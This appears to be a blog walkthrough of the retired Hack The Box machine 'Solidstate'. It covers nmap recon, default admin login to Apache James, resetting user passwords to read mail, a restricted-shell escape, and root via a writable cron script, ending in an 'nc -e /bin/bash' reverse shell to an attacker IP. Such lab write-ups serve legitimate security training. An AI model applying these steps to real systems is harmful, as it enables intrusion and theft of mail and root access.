Skip to main content

Hackhebox.eu - Retired - Solidstate

HacktheBox.eu - Retired - solidstate



Recon


So  I start as always with a simple UP/Down scan


nmap -T4 -p- -oX ./nmapb.xml solidstate.htb


Then I convert that to HTML to make it pretty

xsltproc ./nmapb.xml -o ./nmapb.html





Thats a goodly amount of open ports


22,25,80,110,119,4555


Let’s scan with nmap again with the -A switch to run all the scripts against those ports.


 nmap -T4 -p22,25,80,110,119,4555 -A -oX ./nmapf.xml solidstate.htb  



Then I convert that to HTML also


xsltproc ./nmapf.xml -o ./nmapf.htm




Ok we got open ssh 7.4.1 on 22 apache 2.4.25 on 80 and a bunch of stuff that says james($service) on 25,110,119 and 4555



James is a mail server for apache

https://james.apache.org/

Java Apache Mail Enterprise Server


So it makes sense to see 25(smtp), 110(pop3),119(nntp?) and 4555 which is some sort of remote admin for james



Let’s check out port 80








Exploit




Checking around for vulnerabilities in JAMES i found this


https://gist.github.com/kjiwa/82d3bb091d45b59c1d7674727b1292a7


Which creates a new user and executes code the next time that user logs in…


For grins and giggles it says the james default admin is root/root


I opened telnet just to see and…




Shocked Gif Laughing GIF


Cool root/root works lets poke around starting with the help command to see what we can do.



Listusers, lets get some info





So the setpassword is interesting too. We can change the users passwords then login to their pop account and read their emails.


Here is a blog about looking at pop through the command line

https://www.shellhacks.com/retrieve-email-pop3-server-command-line/




The user Mindy was the first that had any email in it that I tested.



A welcome email and a password


Username: mindy

Pass: P@55W0rd1!2@



There also one other email in Johns mailbox






I wonder if mindy changed her password their password as instructed in the email?


Let’s see if we can ssh as mindy


Ssh mindy@solidstate.htb




Let’s see what is in Mindy’s folder?




That was quick


The Office Kevin GIF


Ok lets pivot to privilege escalation.



Ok here is the thing though mindy is stuck with a restricted shell and can’t do a lot of commands.. Like even change directory.


We need to escape out of this bash hell


Eventually I tried doing another ssh session where it ignores the profile



ssh mindy@solidstate.htb -t "bash --noprofile"



Its uglier, but at least we have some power



Poking around the os I found this in /opt



A script that belongs to root… that we have write access too :)


#!/usr/bin/env python

import os

import sys

try:

     os.system('rm -r /tmp/* ')

except:

     sys.exit()



Its just goes in an deletes everything in the /tmp folder.


I think this is running on a schedule because I’ve already seen some of my tools disappear from /tmp


So easy win here is just to change this to dump the /root/root.txt file out to the /tmp directory were we can read it..


Import os

os.system(“cat /root/root.txt > /tmp/root.xt”)



Then wait a minute for it to run



That was easy.. But let’s get a root shell too, which should be really simple 

Just modify our tmp.py


Import os

os.system(“nc -e /bin/bash 10.10.14.18 5555”)



And wait for the minute to change




And here is the job that is running tmp.py

            
            



            Pepsi Refreshing GIF












Labels:

Comments

Post a Comment

Popular posts from this blog

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar...
Post a Comment
Read more

Hack The Box - Retired - Laboratory

HackTheBox - Laboratory - Retired Starting off with a quick scan using threader6000 /opt/threader3000/threader6000.py 10.10.10.216 Ports 22,80,443 came back. Run nmap against these ports. nmap -p22,80,443 -sV -sC -T4 -Pn -oN 10.10.10.216 10.10.10.216 nmap -p22,80,443 -sV -sC -Pn -T4 -oN 10.10.10.216 10.10.10.216 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-13 17:43 EDT Nmap scan report for laboratory.htb (10.10.10.216) Host is up (0.060s latency). PORT    STATE SERVICE  VERSION 22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA) |   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA) |_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519) 80/tcp  open  http     Apache httpd 2.4.41 |_...
Post a Comment
Read more

A collection of online Security CTF and Learning sites

 Hellbound Hackers    Embedded Security CTF Arizona Cyber Warfare Range Over The Wire - Bandit Pico CTF 2018 Hack The Box.eu Root Me: Challenges/Forensic RingZero CTF Vulnerable By Design - Vulnerable VMs Murder Mystery SQL Challenge Incident Response Challenge Authentication Lab Walkthroughs Defcon CTF Archives Matrix Holiday Hack Cyber Defenders | Blue Team and CTF Crypto Hack - learning Crypto Video Learning Zero to Hero Pentesting by The Cyber Mentor
Post a Comment
Read more